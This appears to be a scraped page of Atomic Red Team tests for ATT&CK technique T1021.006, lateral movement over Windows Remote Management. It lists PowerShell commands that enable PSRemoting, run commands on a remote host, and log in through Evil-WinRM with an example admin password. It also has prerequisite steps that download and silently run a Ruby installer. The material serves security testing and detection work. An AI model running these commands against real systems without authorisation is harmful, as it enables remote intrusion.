T1021.006
Remote Services: Windows Remote Management
Description from ATT&CK
Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the
command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014) WinRM can be used as a method of remotely interacting with Windows Management Instrumentation.(Citation: MSDN WMI)
https://www.aleksandrhovhannisyan.com/blog/how-to-add-a-copy-to-clipboard-button-to-your-jekyll-blog/1
winrm
Atomic Tests
Atomic Test #1 - Enable Windows Remote Management
Powershell Enable WinRM
Upon successful execution, powershell will "Enable-PSRemoting" allowing for remote PS access.
Supported Platforms: windows
auto_generated_guid: 9059e8de-3d7d-4954-a322-46161880b9cf
Inputs:
None
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
Enable-PSRemoting -Force
Atomic Test #2 - Invoke-Command
Execute Invoke-command on remote host.
Upon successful execution, powershell will execute ipconfig on localhost using
.1
invoke-command
Supported Platforms: windows
auto_generated_guid: 5295bd61-bd7e-4744-9d52-85962a4cf2d6
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
host_name | Remote Windows Host Name | String | localhost |
remote_command | Command to execute on remote Host | String | ipconfig |
Attack Commands: Run with powershell!
1
2
invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
Atomic Test #3 - WinRM Access with Evil-WinRM
An adversary may attempt to use Evil-WinRM with a valid account to interact with remote systems that have WinRM enabled
Supported Platforms: windows
auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
user_name | Username | string | Domain\Administrator |
destination_address | Remote Host IP or Hostname | string | Target |
password | Password | string | P@ssw0rd1 |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
evil-winrm -i #{destination_address} -u #{user_name} -p #{password}
Dependencies: Run with powershell!
Description: Computer must have Ruby Installed Check Prereq Commands:
1
if (ruby -v) {exit 0} else {exit 1}
Get Prereq Commands:
1
2
3
Invoke-WebRequest -OutFile $env:Temp\rubyinstaller-2.7.1-1-x64.exe https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-2.7.1-1/rubyinstaller-2.7.1-1-x64.exe
$file1= $env:Temp + "\rubyinstaller-2.7.1-1-x64.exe"
Start-Process $file1 /S;
Description: Computer must have Evil-WinRM installed Check Prereq Commands:
1
if (evil-winrm -h) {exit 0} else {exit 1}
Get Prereq Commands:
1
gem install evil-winrm